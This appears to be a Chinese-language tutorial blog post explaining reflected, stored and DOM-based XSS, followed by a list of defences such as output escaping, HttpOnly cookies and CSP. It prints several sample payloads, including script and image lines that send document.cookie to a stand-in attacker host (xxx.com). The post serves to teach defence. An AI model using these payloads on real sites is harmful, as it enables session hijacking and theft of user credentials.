主頁 > 企業開發 > 了解一下XSS

了解一下XSS

2023-04-26 08:01:50 企業開發

XSS,即跨站腳本攻擊(Cross-Site Scripting),是一種常見的網路安全漏洞,攻擊者通過在網頁中注入惡意腳本代碼,使得瀏覽器執行這些腳本,從而控制網頁上的內容或者獲取用戶的敏感資訊,XSS 攻擊一般分為反射型、存盤型和 DOM 型三種型別,


1. 反射型 XSS 攻擊

反射型 XSS 攻擊是指攻擊者通過向目標網站提交帶有惡意腳本代碼的請求,使得服務器將這些代碼反射回瀏覽器,瀏覽器執行這些腳本,從而控制網頁上的內容或者竊取用戶的敏感資訊,這種攻擊方式通常利用了一些用戶互動的機制,例如搜索框、評論框等,

例如,一個網站的搜索功能會將用戶輸入的內容作為引數傳遞到后端,后端會將這些引數拼接到一個 HTML 模板中回傳給前端,攻擊者可以通過在搜索框中輸入惡意腳本代碼,使得這些代碼被拼接到 HTML 模板中,當其他用戶訪問這個頁面時,這些惡意腳本代碼會被執行,從而控制網頁上的內容或者竊取用戶的敏感資訊,


2. 存盤型 XSS 攻擊

存盤型 XSS 攻擊是指攻擊者將惡意腳本代碼存盤到目標網站的資料庫中,當其他用戶訪問這個網站時,這些惡意腳本代碼會被加載并執行,從而控制網頁上的內容或者竊取用戶的敏感資訊,

例如,一個網站的評論功能允許用戶提交評論并將評論存盤到資料庫中,攻擊者可以通過提交帶有惡意腳本代碼的評論,將這些代碼存盤到資料庫中,當其他用戶訪問這個頁面時,這些惡意腳本代碼會被加載并執行,從而控制網頁上的內容或者竊取用戶的敏感資訊,


3. DOM 型 XSS 攻擊

DOM 型 XSS 攻擊是指攻擊者通過在網頁中注入惡意腳本代碼,使得瀏覽器執行這些腳本,從而控制網頁上的內容或者竊取用戶的敏感資訊,與反射型和存盤型 XSS 攻擊不同,DOM 型 XSS 攻擊不需要向服務器提交帶有惡意腳本代碼的請求,攻擊者直接通過修改網頁的 DOM 結構,將惡意腳本代碼注入到網頁中,

例如,一個網站的 URL 中包含一個引數,用來指定網頁上的某個元素的 ID,攻擊者可以通過在 URL 中注入惡意腳本代碼,使得這些代碼被瀏覽器決議執行,從而控制網頁上的內容或者竊取用戶的敏感資訊,

 

 


 

 

以下是一些常見的 XSS 攻擊實體:

1. 假設有一個網站的搜索功能允許用戶在搜索框中輸入搜索關鍵字,并將關鍵字作為引數傳遞到服務器端進行搜索,攻擊者可以在搜索框中輸入惡意腳本代碼,例如:

<script>alert('XSS攻擊')</script>

當其他用戶訪問這個頁面時,瀏覽器會執行這些惡意腳本代碼,彈出一個對話框,從而欺騙用戶或竊取用戶的敏感資訊,

 

 

2. 假設有一個網站的評論功能允許用戶在評論框中提交評論,并將評論保存到資料庫中,攻擊者可以在評論框中提交惡意腳本代碼,例如:

<script>location.href='http://xxx.com/?cookie='+document.cookie</script>

當其他用戶訪問這個網頁時,瀏覽器會加載并執行這些惡意腳本代碼,將用戶的 Cookie 資訊發送到攻擊者的服務器,從而竊取用戶的會話資訊,


3. 假設有一個網站的 URL 中包含一個引數,用來指定網頁上的某個元素的 ID,攻擊者可以構造如下的 URL,將惡意腳本代碼注入到網頁中:

http://example.com/page.html?element=<script>...</script>

當用戶訪問這個 URL 時,瀏覽器會決議執行其中的惡意腳本代碼,從而控制網頁上的內容或者竊取用戶的敏感資訊,


4. 假設有一個網站的用戶個人資料頁面允許用戶上傳頭像,攻擊者可以上傳一個帶有惡意腳本代碼的圖片,例如:

<img src="http://xxx.com/attack.php?cookie='+document.cookie+'" />

當其他用戶訪問該用戶的個人資料頁面時,瀏覽器會加載并執行這張圖片中的惡意腳本代碼,從而竊取用戶的會話資訊,


5. 假設有一個網站的管理員后臺頁面需要用戶輸入用戶名和密碼進行登錄,攻擊者可以在登錄頁面中注入如下的惡意腳本代碼:

<script>document.forms[0].action='http://xxx.com/steal.php?cookie='+document.cookie;</script>

當管理員在該登錄頁面輸入用戶名和密碼并點擊登錄按鈕時,瀏覽器會將管理員的 Cookie 資訊發送到攻擊者的服務器,從而竊取管理員的會話資訊,

 

 



為了防范 XSS 攻擊,前端開發人員可以采用以下措施:

1. 對用戶輸入進行過濾和驗證,避免將惡意腳本代碼傳遞到服務器端,
2. 對輸出到網頁的內容進行轉義,避免惡意腳本代碼被瀏覽器執行,
3. 使用 HTTP Only Cookie,避免攻擊者竊取用戶的會話資訊,
4. 使用 Content Security Policy(CSP),限制網頁中可以執行的腳本代碼的來源,
5. 使用驗證碼、限制用戶輸入長度等機制,降低攻擊的成功率,
6. 使用 HTTPS 協議傳輸敏感資訊,避免資訊被竊取或篡改,
7. 及時更新和修復網站漏洞,避免攻擊者利用已知的漏洞進行攻擊,
8. 避免使用 eval()、innerHTML 等可以執行字串的函式,避免將惡意腳本代碼注入到網頁中,
9. 在撰寫代碼時,始終保持安全意識,避免在代碼中暴露敏感資訊或者給攻擊者留下漏洞,

 


總之,為了防范 XSS 攻擊,前端開發人員需要在代碼撰寫程序中注重安全性,并采用一些安全性較高的編碼技術和工具,以確保網站的安全性和可靠性,當然現在用的vue、react等配合打包工具,很大程度上已經規避了很多風險,但還是要注意防范,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/551230.html

標籤:其他

上一篇:【谷歌插件開發】獲取當前網站COOKIE并上報HTTP-API

下一篇:返回列表

標籤雲
其他(158131) Python(38106) JavaScript(25394) Java(18001) C(15217) 區塊鏈(8260) C#(7972) AI(7469) 爪哇(7425) MySQL(7144) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5870) 数组(5741) R(5409) Linux(5329) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4561) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2431) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1960) Web開發(1951) HtmlCss(1927) python-3.x(1918) 弹簧靴(1913) C++(1911) xml(1889) PostgreSQL(1874) .NETCore(1855) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • IEEE1588PTP在數字化變電站時鐘同步方面的應用

    IEEE1588ptp在數字化變電站時鐘同步方面的應用 京準電子科技官微——ahjzsz 一、電力系統時間同步基本概況 隨著對IEC 61850標準研究的不斷深入,國內外學者提出基于IEC61850通信標準體系建設數字化變電站的發展思路。數字化變電站與常規變電站的顯著區別在于程序層傳統的電流/電壓互 ......

    uj5u.com 2020-09-10 03:51:52 more
  • HTTP request smuggling CL.TE

    CL.TE 簡介 前端通過Content-Length處理請求,通過反向代理或者負載均衡將請求轉發到后端,后端Transfer-Encoding優先級較高,以TE處理請求造成安全問題。 檢測 發送如下資料包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 ......

    uj5u.com 2020-09-10 03:52:11 more
  • 網路滲透資料大全單——漏洞庫篇

    網路滲透資料大全單——漏洞庫篇漏洞庫 NVD ——美國國家漏洞庫 →http://nvd.nist.gov/。 CERT ——美國國家應急回應中心 →https://www.us-cert.gov/ OSVDB ——開源漏洞庫 →http://osvdb.org Bugtraq ——賽門鐵克 →ht ......

    uj5u.com 2020-09-10 03:52:15 more
  • 京準講述NTP時鐘服務器應用及原理

    京準講述NTP時鐘服務器應用及原理京準講述NTP時鐘服務器應用及原理 安徽京準電子科技官微——ahjzsz 北斗授時原理 授時是指接識訓通過某種方式獲得本地時間與北斗標準時間的鐘差,然后調整本地時鐘使時差控制在一定的精度范圍內。 衛星導航系統通常由三部分組成:導航授時衛星、地面檢測校正維護系統和用戶 ......

    uj5u.com 2020-09-10 03:52:25 more
  • 利用北斗衛星系統設計NTP網路時間服務器

    利用北斗衛星系統設計NTP網路時間服務器 利用北斗衛星系統設計NTP網路時間服務器 安徽京準電子科技官微——ahjzsz 概述 NTP網路時間服務器是一款支持NTP和SNTP網路時間同步協議,高精度、大容量、高品質的高科技時鐘產品。 NTP網路時間服務器設備采用冗余架構設計,高精度時鐘直接來源于北斗 ......

    uj5u.com 2020-09-10 03:52:35 more
  • 詳細解讀電力系統各種對時方式

    詳細解讀電力系統各種對時方式 詳細解讀電力系統各種對時方式 安徽京準電子科技官微——ahjzsz,更多資料請添加VX 衛星同步時鐘是我京準公司開發研制的應用衛星授時時技術的標準時間顯示和發送的裝置,該裝置以M國全球定位系統(GLOBAL POSITIONING SYSTEM,縮寫為GPS)或者我國北 ......

    uj5u.com 2020-09-10 03:52:45 more
  • 如何保證外包團隊接入企業內網安全

    不管企業規模的大小,只要企業想省錢,那么企業的某些服務就一定會采用外包的形式,然而看似美好又經濟的策略,其實也有不好的一面。下面我通過安全的角度來聊聊使用外包團的安全隱患問題。 先看看什么服務會使用外包的,最常見的就是話務/客服這種需要大量重復性、無技術性的服務,或者是一些銷售外包、特殊的職能外包等 ......

    uj5u.com 2020-09-10 03:52:57 more
  • PHP漏洞之【整型數字型SQL注入】

    0x01 什么是SQL注入 SQL是一種注入攻擊,通過前端帶入后端資料庫進行惡意的SQL陳述句查詢。 0x02 SQL整型注入原理 SQL注入一般發生在動態網站URL地址里,當然也會發生在其它地發,如登錄框等等也會存在注入,只要是和資料庫打交道的地方都有可能存在。 如這里http://192.168. ......

    uj5u.com 2020-09-10 03:55:40 more
  • [GXYCTF2019]禁止套娃

    git泄露獲取原始碼 使用GET傳參,引數為exp 經過三層過濾執行 第一層過濾偽協議,第二層過濾帶引數的函式,第三層過濾一些函式 preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'] (?R)參考當前正則運算式,相當于匹配函式里的引數 因此傳遞 ......

    uj5u.com 2020-09-10 03:56:07 more
  • 等保2.0實施流程

    流程 結論 ......

    uj5u.com 2020-09-10 03:56:16 more
最新发布
  • 了解一下XSS

    XSS,即跨站腳本攻擊(Cross-Site Scripting),是一種常見的網路安全漏洞,攻擊者通過在網頁中注入惡意腳本代碼,使得瀏覽器執行這些腳本,從而控制網頁上的內容或者獲取用戶的敏感資訊。XSS 攻擊一般分為反射型、存盤型和 DOM 型三種型別。 1. 反射型 XSS 攻擊 反射型 XSS ......

    uj5u.com 2023-04-26 08:01:50 more
  • 【谷歌插件開發】獲取當前網站COOKIE并上報HTTP-API

    由于本人每天需要登錄網站查看資料并分析統計匯總,而每次機械式地搜索和簡單計算,十分繁瑣。我們可以寫個定時任務,每天根據cookie獲取網站資料并遍歷統計。
    腳本得以成功執行的關鍵是需要獲取到COOKIE
    故,寫了個谷歌插件用來上報COOKIE ......

    uj5u.com 2023-04-26 08:01:00 more
  • 閉包

    閉包理解 如何產生閉包 當一個嵌套的內部(子)函式參考了嵌套外部(父)函式的變數(函式)時--就產生了閉包 閉包是什么 使用chrome除錯查看 理解一 -- 閉包是嵌套的內部函式 理解二 -- 閉包是包含被參考變數(函式)的物件 閉包存在于嵌套的內部函式中 產生閉包的條件 函式嵌套 內部函式參考了 ......

    uj5u.com 2023-04-26 08:00:52 more
  • 了解一下XSS

    XSS,即跨站腳本攻擊(Cross-Site Scripting),是一種常見的網路安全漏洞,攻擊者通過在網頁中注入惡意腳本代碼,使得瀏覽器執行這些腳本,從而控制網頁上的內容或者獲取用戶的敏感資訊。XSS 攻擊一般分為反射型、存盤型和 DOM 型三種型別。 1. 反射型 XSS 攻擊 反射型 XSS ......

    uj5u.com 2023-04-26 08:00:47 more
  • 帶你了解關于FastAPI快速開發Web API專案中的模板和Jinja

    摘要:FastAPI 實際上是為構建 API 和微服務而設計的。它可用于構建使用 Jinja 提供 HTML 服務的 Web 應用程式。 本文分享自華為云社區《FastAPI 快速開發 Web API 專案: 模板和 Jinja 介紹》,作者:宇宙之一粟。 什么是 Jinja 模板是全堆疊 Web 開 ......

    uj5u.com 2023-04-26 07:59:34 more
  • Cesium加載ArcGIS Server4490且orgin -400 400的切片服務

    Cesium在使用加載Cesium.ArcGisMapServerImageryProvider加載切片服務時,默認只支持wgs84的4326坐標系,不支持CGCS2000的4490坐標系。 如果是ArcGIS發布的4490坐標系的切片服務,如果原點在orgin X: -180.0Y: 90.0的情 ......

    uj5u.com 2023-04-26 07:57:24 more
  • Cesium加載ArcGIS Server4490且orgin -400 400的切片服務

    Cesium在使用加載Cesium.ArcGisMapServerImageryProvider加載切片服務時,默認只支持wgs84的4326坐標系,不支持CGCS2000的4490坐標系。 如果是ArcGIS發布的4490坐標系的切片服務,如果原點在orgin X: -180.0Y: 90.0的情 ......

    uj5u.com 2023-04-26 07:56:15 more
  • 博客園silence主題修改記錄

    博客園作為一個老牌技術博客網站,有著非常濃郁的游戲開發、引擎開發以及圖形學氛圍。并且沒有像其他網站有難以接受的廣告。 雖說網站主站看著比較老,但還在接受的范圍。并且可以根據自己的喜好來自定義主題。 尋找主題 以下是找的幾個常見的主題,因為是技術博客閱讀體驗是最重要的,所以最侄訓是選中了silence ......

    uj5u.com 2023-04-25 08:27:42 more
  • axios傳遞引數的使用

    今天在學習elasticsearch時,遇到一個問題:專案中前端采用的是Vue2+axios,后端的介面采用Restful風格來接收: 關于Resultful風格: 1. GET(SELECT):從服務器取出資源(一項或多項); 2. POST(CREATE):在服務器新建一個資源; 3. PUT( ......

    uj5u.com 2023-04-25 08:27:30 more
  • 記錄-使用雙token實作無感重繪,前后端詳細代碼

    這里給大家分享我在網上總結出來的一些知識,希望對大家有所幫助 前言 近期寫的一個專案使用雙token實作無感重繪。最后做了一些總結,本文詳細介紹了實作流程,前后端詳細代碼。前端使用了Vue3+Vite,主要是axios封裝,服務端使用了koa2做了一個簡單的服務器模擬。 一、token 登錄鑒權 j ......

    uj5u.com 2023-04-25 08:27:19 more